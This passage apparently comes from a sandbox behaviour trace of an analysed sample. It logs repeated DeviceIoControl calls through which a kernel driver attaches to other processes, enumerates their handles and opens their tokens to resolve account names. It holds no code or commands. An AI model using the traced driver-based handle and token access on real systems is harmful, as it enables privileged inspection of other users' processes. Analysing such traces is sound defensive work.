hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.432] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0246.432] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.432] PsAcquireProcessExitSynchronization () returned 0x0 [0246.432] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0) [0246.432] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800214b8c0, HandleInformation=0x0) returned 0x0 [0246.432] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.432] PsReleaseProcessExitSynchronization () returned 0x2 [0246.432] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0246.432] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.432] ObfDereferenceObject (Object=0xfffffa800214b8c0) returned 0x1 [0246.432] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.432] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.432] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.432] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.432] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.432] PsAcquireProcessExitSynchronization () returned 0x0 [0246.432] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0) [0246.433] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.433] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.433] PsReleaseProcessExitSynchronization () returned 0x2 [0246.433] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0246.433] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.433] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.433] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.433] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.433] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.433] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.433] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.433] PsAcquireProcessExitSynchronization () returned 0x0 [0246.433] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0) [0246.433] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021546f0, HandleInformation=0x0) returned 0x0 [0246.433] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.433] PsReleaseProcessExitSynchronization () returned 0x2 [0246.433] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0246.433] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.433] ObfDereferenceObject (Object=0xfffffa80021546f0) returned 0x1 [0246.433] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.433] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.433] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.434] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.434] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.434] PsAcquireProcessExitSynchronization () returned 0x0 [0246.434] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0) [0246.434] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00190eac0, HandleInformation=0x0) returned 0x0 [0246.434] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.434] PsReleaseProcessExitSynchronization () returned 0x2 [0246.434] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0246.434] ObQueryNameString (in: Object=0xfffff8a00190eac0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.434] ObfDereferenceObject (Object=0xfffff8a00190eac0) returned 0x1 [0246.434] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.434] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b4) returned 0xc8 [0246.434] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.434] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002155060, HandleInformation=0x0) returned 0x0 [0246.434] ObOpenObjectByPointer (in: Object=0xfffffa8002155060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.434] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x14 [0246.434] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0246.434] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.434] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.435] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.435] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.437] CloseHandle (hObject=0xc4) returned 1 [0246.437] CloseHandle (hObject=0xc8) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.437] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.437] PsAcquireProcessExitSynchronization () returned 0x0 [0246.437] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0) [0246.437] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002151170, HandleInformation=0x0) returned 0x0 [0246.437] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.437] PsReleaseProcessExitSynchronization () returned 0x2 [0246.437] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0246.437] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.437] ObfDereferenceObject (Object=0xfffffa8002151170) returned 0x1 [0246.437] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.437] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0246.437] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.437] PsAcquireProcessExitSynchronization () returned 0x0 [0246.437] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0) [0246.438] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002133330, HandleInformation=0x0) returned 0x0 [0246.438] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.438] PsReleaseProcessExitSynchronization () returned 0x2 [0246.438] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0246.438] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.438] ObfDereferenceObject (Object=0xfffffa8002133330) returned 0x1 [0246.438] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.438] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.438] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.438] PsAcquireProcessExitSynchronization () returned 0x0 [0246.438] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0) [0246.438] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.438] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.438] PsReleaseProcessExitSynchronization () returned 0x2 [0246.438] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0246.438] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.438] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.438] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.438] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.439] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.439] PsAcquireProcessExitSynchronization () returned 0x0 [0246.439] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0) [0246.439] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002151a90, HandleInformation=0x0) returned 0x0 [0246.439] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.439] PsReleaseProcessExitSynchronization () returned 0x2 [0246.439] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0246.439] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.439] ObfDereferenceObject (Object=0xfffffa8002151a90) returned 0x1 [0246.439] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.439] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.439] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.439] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.439] PsLookupProcessByProcessId (in: ProcessId=0x9b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.439] PsAcquireProcessExitSynchronization () returned 0x0 [0246.439] KeStackAttachProcess (in: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002155060, ApcState=0xfffff880053c85d0) [0246.439] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001915e40, HandleInformation=0x0) returned 0x0 [0246.439] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.439] PsReleaseProcessExitSynchronization () returned 0x2 [0246.439] ObfDereferenceObject (Object=0xfffffa8002155060) returned 0x12 [0246.439] ObQueryNameString (in: Object=0xfffff8a001915e40, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.439] ObfDereferenceObject (Object=0xfffff8a001915e40) returned 0x1 [0246.439] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.440] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9c4) returned 0xc8 [0246.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.440] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002164b30, HandleInformation=0x0) returned 0x0 [0246.440] ObOpenObjectByPointer (in: Object=0xfffffa8002164b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.440] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x14 [0246.440] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0246.440] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.440] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.440] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.440] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.442] CloseHandle (hObject=0xc4) returned 1 [0246.442] CloseHandle (hObject=0xc8) returned 1 [0246.442] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.442] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.442] PsAcquireProcessExitSynchronization () returned 0x0 [0246.442] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0) [0246.442] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021644f0, HandleInformation=0x0) returned 0x0 [0246.443] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.443] PsReleaseProcessExitSynchronization () returned 0x2 [0246.443] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0246.443] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.443] ObfDereferenceObject (Object=0xfffffa80021644f0) returned 0x1 [0246.443] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.443] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.443] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.443] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0246.443] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.443] PsAcquireProcessExitSynchronization () returned 0x0 [0246.443] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0) [0246.443] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021617d0, HandleInformation=0x0) returned 0x0 [0246.443] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.443] PsReleaseProcessExitSynchronization () returned 0x2 [0246.443] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0246.443] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.443] ObfDereferenceObject (Object=0xfffffa80021617d0) returned 0x1 [0246.443] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.443] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.443] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.443] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.444] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.444] PsAcquireProcessExitSynchronization () returned 0x0 [0246.444] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0) [0246.444] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.444] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.444] PsReleaseProcessExitSynchronization () returned 0x2 [0246.444] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x12 [0246.444] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.444] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.444] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.444] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.444] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.444] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.444] PsLookupProcessByProcessId (in: ProcessId=0x9c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.444] PsAcquireProcessExitSynchronization () returned 0x0 [0246.444] KeStackAttachProcess (in: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002164b30, ApcState=0xfffff880053c85d0) [0246.444] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800216a070, HandleInformation=0x0) returned 0x0 [0246.444] KeUnstackDetachProcess 